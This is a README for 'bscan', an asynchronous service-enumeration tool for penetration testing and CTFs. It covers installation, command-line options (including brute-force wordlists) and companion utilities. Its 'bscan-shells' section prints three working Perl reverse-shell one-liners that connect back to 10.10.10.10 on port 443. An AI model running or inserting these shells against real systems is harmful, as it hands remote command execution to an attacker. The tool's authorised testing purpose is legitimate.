Synopsis
bscan
is a command-line utility to perform active information gathering and service enumeration. At its core, bscan
asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output and a well-defined directory structure.
License
bscan
is intended for educational purposes and events such as CTFs only and should never be run on machines and/or networks without explicit prior consent. This code is released under the MIT license.
Installation
bscan
was written to be run on Kali Linux, but there is nothing inherently preventing it from running on any OS with the appropriate tools installed. There's a few different types of packaged releases and ways to install them.
The easiest way to get up and running is to install the appropriate single-file executable version of the program for your operating system (no Python installation required):
# on Linux (i.e., Kali)
wget -O bscan https://releases.brianwel.ch/bscan/linux
# on Windows
powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; wget 'https://releases.brianwel.ch/bscan/windows' -OutFile 'bscan.exe'"
# to download a specific version, use the following pattern
wget -O bscan https://releases.brianwel.ch/github/bscan/linux/0.1.4
You can also download the latest packaged version from PyPI (note that this requires an existing Python 3.6+ installation):
pip install bscan
Similarly, you could get the bleeding-edge version from version control:
pip install https://github.com/welchbj/bscan/archive/master.tar.gz
Basic Usage
bscan
has a wide variety of configuration options which can be used to tune scans to your needs. Here's a quick example:
$ bscan \
> --max-concurrency 3 \
> --patterns [Mm]icrosoft \
> --status-interval 10 \
> --verbose-status \
> scanme.nmap.org
What's going on here?
--max-concurrency 3
means that no more than 3 concurrent scan subprocesses will be run at a time--patterns [Mm]icrosoft
defines a custom regex pattern with which to highlight matches in the generated scan output--status-interval 10
tellsbscan
to print runtime status updates every 10 seconds--verbose-status
means that each of these status updates will print details of all currently-running scan subprocessesscanme.nmap.org
is the host upon which we want to enumerate
bscan
also relies on some additional configuration files. The default files can be found in the bscan/configuation
directory and serve the following purposes:
patterns.txt
specifies the regex patterns to be highlighted in console output when matched with scan outputrequired-programs.txt
specifies the installed programs thatbscan
plans on usingport-scans.toml
defines the port-discovering scans to be run on the target(s), as well as the regular expressions used to parse port numbers and service names from scan outputservice-scans.toml
defines the scans be run on the target(s) on a per-service basis
Detailed Options
Here's what you should see when running bscan --help
:
usage: bscan [OPTIONS] targets
_
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| |_) \__ \ (__ (_| | | | |
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an asynchronous service enumeration tool
positional arguments:
targets the targets and/or networks on which to perform enumeration
optional arguments:
-h, --help show this help message and exit
--brute-pass-list F filename of password list to use for brute-forcing
--brute-user-list F filename of user list to use for brute-forcing
--cmd-print-width I the maximum integer number of characters allowed when printing
the command used to spawn a running subprocess (defaults to 80)
--config-dir D the base directory from which to load the configuration files;
required configuration files missing from this directory will
instead be loaded from the default files shipped with this
program
--hard force overwrite of existing directories
--max-concurrency I maximum integer number of subprocesses permitted to be running
concurrently (defaults to 20)
--no-program-check disable checking the presence of required system programs
--no-file-check disable checking the presence of files such as configured
wordlists
--no-service-scans disable running scans on discovered services
--output-dir D the base directory in which to write output files
--patterns [ [ ...]] regex patterns to highlight in output text
--ping-sweep enable ping sweep filtering of hosts from a network range
before running more intensive scans
--quick-only whether to only run the quick scan (and not include the
thorough scan over all ports)
--qs-method S the method for performing the initial TCP port scan; must
correspond to a configured port scan
--status-interval I integer number of seconds to pause in between printing status
updates; a non-positive value disables updates (defaults to 30)
--ts-method S the method for performing the thorough TCP port scan; must
correspond to a configured port scan
--udp whether to run UDP scans
--udp-method S the method for performing the UDP port scan; must correspond
to a configured port scan
--verbose-status whether to print verbose runtime status updates, based on
frequency specified by `--status-interval` flag
--version program version
--web-word-list F the wordlist to use for scans
Companion Tools
The main bscan
program ships with two utility programs (bscan-wordlists
and bscan-shells
) to make your life a little easier when looking for wordlists and trying to open reverse shells.
bscan-wordlists
is a program designed for finding wordlist files on Kali Linux. It searches a few default directories and allows for glob filename matching. Here's a simple example:
$ bscan-wordlists --find "*win*"
/usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt
/usr/share/wordlists/metasploit/sensitive_files_win.txt
/usr/share/seclists/Passwords/common-passwords-win.txt
Try bscan-wordlists --help
to explore other options.
bscan-shells
is a program that will generate a variety of reverse shell one-liners with target
and port
fields populated for you. Here's a simple example to list all Perl-based shells, configured to connect back to 10.10.10.10
on port 443
:
$ bscan-shells --port 443 10.10.10.10 | grep -i -A1 perl
perl for windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl with /bin/sh
perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl without /bin/sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Note that bscan-shells
pulls these commands from the reverse-shells.toml
configuration file. Try bscan-shells --help
to explore other options.
Development
Start by setting up a new development environment and installing the requirements (using virtualenvwrapper
/ virtualenvwrapper-win
):
# setup the environment
mkvirtualenv -p $(which python3) bscan-dev
workon bscan-dev
# get the deps
pip install -r dev-requirements.txt
Lint and type-check the project (these are run on Travis, too):
flake8 . && mypy bscan
When it's time to package a new release:
# build the single-file executable
pyinstaller bscan.spec
# build source and wheel distributions
python setup.py bdist_wheel sdist
# run post-build checks
twine check dist/*
# upload to PyPI
twine upload dist/*